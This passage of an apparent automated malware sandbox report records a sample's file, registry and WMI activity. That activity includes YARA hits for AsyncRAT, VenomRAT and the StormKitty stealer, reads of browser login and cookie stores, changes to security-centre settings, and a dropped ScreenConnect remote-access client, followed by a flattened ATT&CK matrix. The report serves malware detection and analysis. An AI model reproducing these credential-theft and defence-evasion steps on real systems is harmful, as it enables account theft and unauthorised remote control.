                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Core.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Windows.dll VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Windows.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Windows.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeCode function: 8_2_00007FFA208D2B10 QueryPerformanceFrequency,GetSystemTimeAsFileTime,QueryPerformanceCounter,8_2_00007FFA208D2B10
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 5140, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7468, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7724, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7548, type: MEMORYSTR
                            Changes security center settings (notifications, updates, antivirus, firewall)
                            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
                            Modifies security policies related information
                            Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages
                            Source: svchost.exe, 00000011.00000002.6324493131.00000167DD502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                            Source: newpoveno.exe, 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
                            Source: newpoveno.exe, 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procexp.exe
                            Source: svchost.exe, 00000011.00000002.6324493131.00000167DD502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: newpoveno.exe, 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, newpoveno.exe, 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected StormKitty Stealer
                            Source: Yara matchFile source: 0000000C.00000002.6331801761.0000000003404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.6331801761.000000000357D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6368, type: MEMORYSTR
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                            Source: Yara matchFile source: 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.6331801761.000000000357D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6368, type: MEMORYSTR

                            Remote Access Functionality

                            barindex
                            Yara detected StormKitty Stealer
                            Source: Yara matchFile source: 0000000C.00000002.6331801761.0000000003404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.6331801761.0000000003093000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.6331801761.000000000357D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 6368, type: MEMORYSTR
                            Source: Yara matchFile source: 37.2.Document.exe.5790000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 46.2.ScreenConnect.WindowsClient.exe.2ebfa10.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 46.0.ScreenConnect.WindowsClient.exe.bb0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.2.Document.exe.5790000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.0.Document.exe.805db0.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.0.Document.exe.7dc3d4.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.0.Document.exe.7563d4.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 37.0.Document.exe.740000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000002E.00000000.4279525006.0000000000BB2000.00000002.00000001.01000000.0000001C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000002.4319151822.00000000065E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000002.4300058018.0000000005790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000002E.00000002.6329378162.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Document.exe PID: 6848, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5704, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 8000, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4276, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Windows\Temp\~DFADB967A848420FAD.TMP, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                            Source: Yara matchFile source: C:\Config.Msi\3dc3b5.rbs, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Temp\~DF7DD5C6CF3244B659.TMP, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Temp\~DF4BD5D31B57736E59.TMP, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Temp\~DFD7A972176369F367.TMP, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Temp\~DF43DA0E5046E12DCA.TMP, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Temp\~DF9BF6D7E97EECDDD3.TMP, type: DROPPED
                            Source: Yara matchFile source: C:\Windows\Installer\MSIC5D7.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Document.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information52
                            Scripting                            		1
                            Replication Through Removable Media                            		131
                            Windows Management Instrumentation                            		52
                            Scripting                            		1
                            DLL Side-Loading                            		41
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            System Time Discovery                            		Remote Services11
                            Archive Collected Data                            		1
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts11
                            Native API                            		1
                            DLL Side-Loading                            		1
                            Component Object Model Hijacking                            		11
                            Deobfuscate/Decode Files or Information                            		111
                            Input Capture                            		11
                            Peripheral Device Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Exploitation for Client Execution                            		1
                            Component Object Model Hijacking                            		1
                            Access Token Manipulation                            		331
                            Obfuscated Files or Information                            		Security Account Manager1
                            File and Directory Discovery                            		SMB/Windows Admin Shares111
                            Input Capture                            		1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            Command and Scripting Interpreter                            		2
                            Windows Service                            		2
                            Windows Service                            		1
                            Software Packing                            		NTDS57
                            System Information Discovery                            		Distributed Component Object ModelInput Capture3
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud Accounts2
                            Scheduled Task/Job                            		1
                            Browser Extensions                            		312
                            Process Injection                            		1
                            DLL Side-Loading                            		LSA Secrets271
                            Security Software Discovery                            		SSHKeylogging14
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable Media2
                            PowerShell                            		2
                            Scheduled Task/Job                            		2
                            Scheduled Task/Job                            		1
                            File Deletion                            		Cached Domain Credentials2
                            Process Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd Timers1
                            Registry Run Keys / Startup Folder                            		1
                            Registry Run Keys / Startup Folder                            		22
                            Masquerading                            		DCSync181
                            Virtualization/Sandbox Evasion                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                            Modify Registry                            		Proc Filesystem1
                            Application Window Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt181
                            Virtualization/Sandbox Evasion                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                            Access Token Manipulation                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                            Process Injection                            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                            Hidden Users                            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                            Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                            Regsvr32                            		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                            Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                            Rundll32                            		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
